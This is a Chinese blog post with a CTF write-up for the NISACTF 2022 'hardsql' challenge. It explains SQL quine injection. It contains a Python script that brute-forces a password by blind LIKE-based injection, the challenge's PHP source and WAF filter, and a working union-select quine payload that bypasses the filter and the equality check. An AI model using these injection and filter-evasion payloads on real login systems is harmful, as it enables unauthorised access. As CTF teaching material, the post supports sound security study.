SQL注入之Quine注入

最新推荐文章于 2024-07-27 12:20:46 发布
最新推荐文章于 2024-07-27 12:20:46 发布
阅读量2.6k 收藏 11
点赞数 8
文章标签: python web安全
Aiwin
本文链接:https://blog.csdn.net/weixin_53090346/article/details/125531088
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

目录

前言

一、Quine是什么?

二、[NISACTF 2022]hardsql

前言

提示:这里可以添加本文要记录的大概内容:

SQL注入的各种手段很多,今天做CTF题的时候,又遇到了一种不常考的但是很细节的注入,记录一下。

提示:以下是本篇文章正文内容,下面案例可供参考

一、Quine是什么?

Quine指的是自产生程序,简单的说,就是输入的sql语句与要输出的一致,下面是例题。

二、[NISACTF 2022]hardsql

 题目提示:

$password=$_POST['passwd'];
$sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";

1,进入题目:

 题目说登录的账号为bilala,只有登录密码是可注入的点,首先要进行登录,进行一些常规注入的小尝试,发现存在waf过滤了空格,and,updatexml,=,database,sleep,information_schema之类的,过滤的挺多。可以利用like+通配符%进行密码的爆破,爆破脚本如下:

import requests

url = 'http://1.14.71.254:28860/login.php'
str = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
flag = ''
for i in range(62):
    for j in str:
        data = {
            'username': 'bilala', "passwd":f"-1'/**/or/**/passwd/**/like/**/'{flag+j}%'#"
        }
        response = requests.post(url, data=data)
        if "nothing found" not  in response.text:
            flag = flag + j
            print(flag)
            break
print(flag)

登录进去后,看到了源码:     

 <?php
//多加了亿点点过滤

include_once("config.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}

function checkSql($s) {
    if(preg_match("/if|regexp|between|in|flag|=|>|<|and|\||right|left|insert|database|reverse|update|extractvalue|floor|join|substr|&|;|\\\$|char|\x0a|\x09|column|sleep|\ /i",$s)){
        alertMes('waf here', 'index.php');
    }
}

if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['passwd']) && $_POST['passwd'] != '') {
    $username=$_POST['username'];
    $password=$_POST['passwd'];
    if ($username !== 'bilala') {
        alertMes('only bilala can login', 'index.php');
    }
    checkSql($password);
    $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";
    $user_result=mysqli_query($MysqlLink,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes('nothing found','index.php');
    }
    if ($row['passwd'] === $password) {
        if($password == 'b2f2d15b3ae082ca29697d8dcd420fd7'){
            show_source(__FILE__);
            die;
        }
        else{
            die($FLAG);
        }
    } else {
        alertMes("wrong password",'index.php');
    }
}

?>

 解题的关键思路在:

  if ($row['passwd'] === $password) { #关键
        if($password == 'b2f2d15b3ae082ca29697d8dcd420fd7'){
            show_source(__FILE__);
            die;
        }
        else{
            die($FLAG);
        }
    } else {
        alertMes("wrong password",'index.php');
    }
}

查询出来的passwd要和$password强相等,且$passwor不等于b2f2d15b3ae082ca29697d8dcd420fd7。

但是事实上这张表其实是个空表,只有构造输入输出完全一致的语句,才能绕过限制得到FLAG,主要利用replace(str,old_string,new_string)进行构造,构造思路如下:

select replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');

利用'replace(".",char(46),".")');替换'replace(".",char(46),".")'中的符号.

输入和输出的结果为: 

replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');

replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")") ;

这样其实还没有达到输入和输出一致的问题,因为还有单引号和双引号不一致,所以要解决单双引号的问题,再套一层replace,将双引号替换成单引号即可,如下:

 replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")');

输出的结果为:

replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")')

 这样就形成了输入和输出的结果一致 。

题中还过滤了char,用chr或者直接0x代替即可。

所以最终的payload为:

username=bilala&passwd='/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#',0x22,0x27),0x25,'"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#')#&login=%E7%99%BB%E5%BD%95

M03-Aiwin
关注
  • 8
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
[NISACTF 2022]hardsql - quine注入
oZuoShen123的博客
10-05 584
题目描述:`$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";` 从描述看出是quine注入,且用户名要是bilala 1、经测试,参数为:username=&passwd=&login=登录,username必须为bilala 2、【= and 空格】被过滤【like or /**/】 3、参考文章:https://blog.csdn.ne
qmc.zip_Sharp_quine
09-23
《C#实现Quine-McCluskey算法详解》 Quine-McCluskey算法,简称QMC算法,是一种用于简化布尔表达式的方法,它主要用于逻辑设计中的化简问题,帮助减少逻辑门的数量,提高电路效率。在C#编程语言中实现QMC算法,可以...
sql注入 Quine注入解析
arcuied
04-24 854
sql注入 Quine注入解析
(超详细)[NISACTF 2022]hardsql——writeup
qq_74426248的博客
07-25 401
本文章为[NISACTF 2022]hardsql——writeup,欢迎各位师傅一起讨论!!!
记录一次quine注入的学习
Zh1A0的博客
08-24 877
记录一次sql注入Quine注入的学习
HSCCTF-WEB-PWD(quine注入
m0_74855736的博客
03-12 868
思路:爆破密码,但like被过滤,因为界面显示,无论访问成功与否都是一样的,无法使用布尔盲注,时间盲注的化sleep,if,substr等函数也被禁用,该题使用一种quine注入的技巧。quine是一种计算机程序,它不接受输入并产生自己源代码的副本作为唯一的输出。里面是空表,因此需要我们的输入与最后的结果相等绕过验证,这就需要用到Quine。先将str里的双引号替换成单引号,再用str替换str里的间隔符。的双引号换成单引号,这样最后就不会出现引号不一致的情况了。中的间隔符使用双引号的原因是,
[HDCTF 2023]LoginMaster 复现 (记quine注入
qq_73767109的博客
04-24 875
benchmark时间盲注 [HDCTF 2023]LoginMaster 复现 quine注入解释
[NISACTF 2022]hardsql
m0_70819573的博客
03-20 432
关键是它要求强比较相同,但弱比较不同,所以要用到Quine,Quine是一种自生产技术,可以使数据库输入和输出相同。3.当失败时会回显nothing found,以此可以爆破密码。爆破出密码登入后没有给flag,而是给了源码。1.打开环境,发现一个登录窗口。
QM.zip_qm_quine mccluskey
09-23
Quine-McCluskey(简称QMC)算法是一种用于化简布尔表达式的经典方法,尤其在数字逻辑设计和计算机科学领域中广泛应用。这个算法主要用于找出一个布尔函数的最简与或表达式,即找到最少的基元事件来表示原布尔表达式...
quine-relay:具有100多种编程语言的uroboros程序
02-16
奎因继电器 这是什么 这是一个生成Rust程序的Ruby程序,该生成Rust的程序生成Scala程序,该Scala程序生成...(总共通过128种语言)。REXX程序再次生成原始Ruby代码。 (如果要查看旧的50语言版本,请参阅分支。...
q---m.zip_Quine-McClusky
09-21
Quine-McCluskey(Q-M)算法是一种在数字逻辑设计中用于简化布尔函数的高效方法。这个算法主要用于减少布尔表达式的项数,从而优化逻辑电路,减少硬件资源的使用,提高系统的运行效率。在计算机科学和电子工程领域,...
Quine-McCluskey C++实现
05-08
用C++实现Quine-McCluskey算法,输入模式为最小项的输入(输入最小项),本程序目前最大支持6个变量的化简,自己编写的程序~输出格式也是以最小项的模式,输出中的' -'表示这个变量不用显示,' 1' 代表最小项中有...
[NISACTF 2022]
snowlyzz的博客
09-09 6103
NISACTF部分WP
NISACTF2022公开通道(复现)
as you know, nlp is fantasitc!
03-31 4748
目录middlerce(复现)join-us(复现)hardsql(复现) middlerce(复现) <?php include "check.php"; if (isset($_REQUEST['letter'])){ $txw4ever = $_REQUEST['letter']; if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
[NISACTF 2022]下
qq_62046696的博客
07-30 2441
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
[NISACTF 2022]WriteUp web篇
Pysnow's Blog
04-01 4476
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
SQL Query
HelloWorld
01-07 524
SQL QueryTablesQueries Tables CREATE TABLE YELP_USER ( Yelp_ID VARCHAR(10) PRIMARY KEY, Email VARCHAR(30) NOT NULL, FN VARCHAR(10) NOT NULL, LN VARCHAR(10) NOT NULL, DOB DATE NOT NULL, BirthPlace VARCHAR(30) NOT NULL, Gender CHA
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
最新发布
qq_64603703的博客
07-27 675
详细解说数据分析pandas库中的常用方法
quine-mccluskey method
11-30
Quine-McCluskey方法是一种用于最小化布尔函数的方法。它通过将布尔函数转换为最简化的多项式形式,以便更容易地实现或设计电路。 该方法的基本思想是使用卡诺图(Karnaugh map)的拓展版本来找到所有的重要项。首先,将布尔函数的真值表转化为卡诺图,然后根据卡诺图中的相邻位单元(最大化相邻的1)进行合并。这些合并操作可以产生更小的项,将真值表中不必要的变量进行消除,最终得到最简化的布尔表达式。 在使用Quine-McCluskey方法时,以下步骤是关键的: 1. 将布尔函数的真值表转换为卡诺图,并将1的位填入相应的格子中。 2. 找到卡诺图中所有的重要项-这些项代表着最后的布尔表达式中的主要组成部分。 3. 按照卡诺图的规则合并相邻位单元(最大化1的位数)。这些合并操作将产生更小的项,减少布尔表达式的复杂性。 4. 继续合并、消除和处理其他重要项,直到不能再进行合并操作为止。 5. 最后,根据卡诺图的结果,得到最简化的布尔表达式。 Quine-McCluskey方法是一种有效的方法,可以用于减少布尔函数的大小,并简化相应的电路设计过程。尽管手工计算非常费时且容易出错,但现代计算机系统可以自动化这一过程,使得设计人员能够更快速、准确地处理复杂的布尔函数。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值